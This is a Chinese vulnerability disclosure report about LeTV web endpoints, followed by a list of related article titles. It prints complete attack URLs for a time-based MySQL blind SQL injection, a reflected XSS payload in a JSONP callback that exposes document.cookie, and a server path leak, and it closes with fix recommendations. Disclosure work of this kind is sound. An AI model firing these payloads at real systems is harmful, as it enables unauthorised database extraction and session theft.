乐视mysql_乐视MySQL盲注、callback反射型XSS及一处绝对路径泄漏
注射点位于(参数ID):
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=1&_=1408792945702
反射型XSS位于:
http://address.shop.letv.com/api/web/insert/insUserAddress.jsonp?callback=callback__%3Cimg%20src=aaaa%20οnerrοr=alert(document.cookie)%3E&
绝对路径泄漏位于:
http://joyearcars2014happy.hz.letv.com/php/joyearcar.php?callback=aaaa&username=
Notice: Undefined index: tel in /letv/joyearcars2014happy.hz.letv.com/php/joyearcar.php on line 11漏洞证明:
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(length(user())>22,sleep(1),0)&_=1408792945702
可猜解当前连接用户的长度为23。
我只猜解了第一个字母的ASCII码为50,字母“2”:
http://joyearcars2014happy.hz.letv.com/php/votenum.php?callback=jQuery171017738118954002857_1408792927555&id=if(ascii(mid(user(),1,1))=50,sleep(1),2)--&_=1408792945702
非root,未进一步利用。
修复方案:
解决SQL注射
编码callback
不显示详细错误信息
乐视mysql_乐视MySQL盲注、callback反射型XSS及一处绝对路径泄漏相关推荐
- 便携式三星mysql_三星集团某站点MySQL盲注一枚(附python验证脚本)
漏洞概要 缺陷编号:WooYun-2014-082219 漏洞标题:三星集团某站点MySQL盲注一枚(附python验证脚本) 相关厂商:三星集团 漏洞作者:lijiejie 提交时间:2014-11 ...
- mysql盲注_二十八、MySQL盲注
在学习本实验之前,请确保已经学过"SQL注入原理与实践"这个实验. 在 SQL注入原理与实践 这个实验中,我们已经知道了SQL注入的原理,并且能够完成支持union 且有回显的注入 ...
- mysql盲注绕过_盲注 绕过技巧
http://www.x.com/sections_intr.php?id=181 and length((database()))=4 http://www.x.com/sections_intr. ...
- mysql盲注_Mysql 布尔型盲注手工注入详解
0x00 什么叫布尔型盲注 布尔型 布尔(Boolean)型是计算机里的一种数据类型,只有True(真)和False(假)两个值.一般也称为逻辑型. 盲注 在注入时页面无具体数据返回的注入称之为盲注, ...
- mysql盲注脱裤_记一次猥琐的脱裤
简介 环境 php+pdo+mysql+linux FUCK IT 因为是pdo,所以支持多行,一开始只用了时间盲注跑了用户表的列出来,然后可以通过多行语句执行 updaet user set ema ...
- php mysql盲注_[题目]记一次利用gopher的内网mysql盲注
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很 ...
- mysql 盲注_mysql简略手工盲注技能
mysql简略手工盲注技能 申明:固然网上对于mysql手工盲注的材料良多 然而大多都是大篇幅 语句极其庞杂 学习盲注前先懂得下 IFORMATION_SCHEMA 库 Mysql5内置的系统数据库I ...
- mysql盲注二分法脚本
PS 闲得蛋疼,写了个盲注的脚本,最后发现还是sqlmap香 import requests #布尔盲注mysql脚本#正常页面的大小 def resLen(url):res=requests.get ...
- mysql盲注脱裤_白帽子挖洞—SQL注入篇
0x00介绍 SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令.具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到 ...
最新文章
- OpenCV使用CUDA处理图像的教程与实战
- 重磅直播 | 图像对齐算法
- 160 - 11 Andrnalin.4
- Servlet实现文件上传
- 测试用例-写测试用例时怎么入手
- 《数据整理实践指南》一第2章 是我的问题还是数据的问题
- 图像分辨率测试—imatest
- SystemV 共享内存
- python3入门与进阶笔记_Python3入门与进阶【笔记】
- 面试题-java高级(答案超详细)
- oracle同义词删除重建,Oracle同义词的创建与删除
- FlowNet2.0 win10系统疑难问题解决
- 5分钟内完成Python键盘记录程序
- Mysql之视图的创建、修改、查看、删除
- 电脑技术员必备工具软件
- 短信验证码登录,以及第三方登录
- 【AI特训营】:柯西分布 Paddle API实现
- Redis几种集群模式
- Caused by: com.sun.org.apache.xerces.internal.impl.io.MalformedByteSequenceException
- ThinkPad T470p总是很快进入睡眠